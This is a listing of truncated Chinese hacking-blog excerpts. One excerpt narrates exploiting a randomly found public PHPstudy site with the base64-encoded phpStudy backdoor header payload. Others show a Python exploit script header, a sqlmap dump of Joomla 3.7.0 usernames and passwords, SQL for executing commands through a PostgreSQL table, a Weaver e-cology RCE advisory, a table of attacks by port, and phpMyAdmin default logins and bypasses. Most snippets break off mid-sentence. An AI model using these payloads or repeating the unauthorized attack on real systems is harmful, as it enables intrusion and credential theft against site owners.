今天有点烦躁，所以得找点事刺激一下 于是，公网上搜了一个PHPstudy的站 测试payload看看有没有漏洞，果然、存在漏洞 看一下目录 GET /phpinfo.php HTTP/1.1 Host...

payload： Accept-Encoding: gzip,deflate Accept-Charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 这个后面是base64加...

#!coding:utf-8 import requests,re,os from sys import argv print ''' [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%...

首先，对其进行扫描 发现其版本为 Joomla 3.7.0 于是，搜索这个版本的漏洞，，， 发现存在SQL注入漏洞，继续查看详情 上sqlmap跑一波,成功爆库。。。 接下来，爆表 爆用户名密码 在线...

这个漏洞需要登录后台后才能利用，我这里是本地漏洞复现，所以忽略登录过程。。。 这里有个在线靶场，有兴趣的可以练练： https://www.mozhe.cn/bug/detail/Zis0bC9SUn...

Android 调试模式 (adb) 一般情况下，是没有开启的。adb 通过 USB 与设备进行通信，但是也可以开启WIFI进行连接手机，进行远程的调试。由于开启了链接wifi的调试，从而被黑客利用并...

端口号 端口说明 攻击技巧 21/22/69 ftp/tftp：文件传输协议 爆破\嗅探\溢出\后门 22 ssh：远程连接 爆破OpenSSH；28个退格 23 telnet：远程连接 爆破\嗅探 ...

[可选]删除你想用来保存命令输出但是可能存在的表 DROP TABLE IF EXISTS cmd_exec 创建你用来保存命令输出的表 CREATE TABLE cmd_exec(cmd_outpu...

0x01漏洞描述 泛微OA办公系统是一款协调办公软件。 泛微协同商务软件系统weaver e-cology 8存在命令执行漏洞，攻击者可利用该漏洞获取服务器权限。 0x02漏洞危害 攻击者可以通过精心...

默认 phpMyAdmin：用户名 root、密码 root 或空登陆。 版本 2.11.3～2.11.4：用户名 'localhost'@'@" 登陆，无需密码。 版本 2.11.9.2：用户名 r...